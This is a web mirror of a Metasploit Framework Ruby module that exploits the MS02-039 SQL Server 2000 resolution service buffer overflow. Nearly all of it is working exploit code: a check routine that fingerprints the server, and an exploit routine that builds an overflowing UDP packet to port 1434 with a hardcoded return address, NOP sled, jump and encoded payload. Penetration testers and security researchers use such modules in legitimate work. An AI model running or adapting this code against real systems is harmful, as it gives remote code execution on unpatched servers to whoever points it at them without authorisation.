Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/mssql/ms02_039_slammer.rb
19591 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::Remote::MSSQL

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'MS02-039 Microsoft SQL Server Resolution Overflow',

16
        'Description' => %q{

17
          This is an exploit for the SQL Server 2000 resolution

18
          service buffer overflow. This overflow is triggered by

19
          sending a udp packet to port 1434 which starts with 0x04 and

20
          is followed by long string terminating with a colon and a

21
          number. This module should work against any vulnerable SQL

22
          Server 2000 or MSDE install (pre-SP3).

23
        },

24
        'Author' => [ 'hdm' ],

25
        'License' => MSF_LICENSE,

26
        'References' => [

27
          [ 'CVE', '2002-0649'],

28
          [ 'OSVDB', '4578'],

29
          [ 'BID', '5310'],

30
          [ 'MSB', 'MS02-039'],

31


32
        ],

33
        'Privileged' => true,

34
        'Payload' => {

35
          'Space' => 512,

36
          'BadChars' => "\x00\x3a\x0a\x0d\x2f\x5c",

37
          'StackAdjustment' => -3500,

38
        },

39
        'Targets' => [

40
          [

41
            'MSSQL 2000 / MSDE <= SP2',

42
            {

43
              'Platform' => 'win',

44
              'Ret' => 0x42b48774,

45
            },

46
          ],

47
        ],

48
        'Platform' => 'win',

49
        'DisclosureDate' => '2002-07-24',

50
        'DefaultTarget' => 0,

51
        'Notes' => {

52
          'Reliability' => UNKNOWN_RELIABILITY,

53
          'Stability' => UNKNOWN_STABILITY,

54
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

55
        }

56
      )

57
    )

58


59
    register_options(

60
      [

61
        Opt::RPORT(1434)

62
      ]

63
    )

64
  end

65


66
  def check

67
    info = mssql_ping

68
    if (info['ServerName'])

69
      print_status("SQL Server Information:")

70
      info.each_pair { |k, v|

71
        print_status("   #{k + (" " * (15 - k.length))} = #{v}")

72
      }

73
      return Exploit::CheckCode::Detected

74
    end

75
    return Exploit::CheckCode::Safe

76
  end

77


78
  def exploit

79
    connect_udp

80
    print_status(sprintf("Sending UDP packet with return address 0x%.8x", target.ret))

81
    print_status("Execute 'net start sqlserveragent' once access is obtained");

82


83
    # \x68:888 => push dword 0x3838383a

84
    buf = "\x04" + rand_text_english(800, payload_badchars) + "\x68:888"

85


86
    # Return to the stack pointer

87
    buf[97, 4] = [target.ret].pack('V')

88


89
    # Which lands right here

90
    buf[101, 6] = make_nops(6)

91


92
    # Jumps 8 bytes ahead

93
    buf[107, 2] = "\xeb\x08"

94


95
    # Write to thread storage space to avoid a crash

96
    buf[109, 8] = [0x7ffde0cc, 0x7ffde0cc].pack('VV')

97


98
    # And finally into the payload

99
    buf[117, payload.encoded.length] = payload.encoded

100


101
    udp_sock.put(buf)

102


103
    disconnect_udp

104
    handler

105
  end

106
end

107


108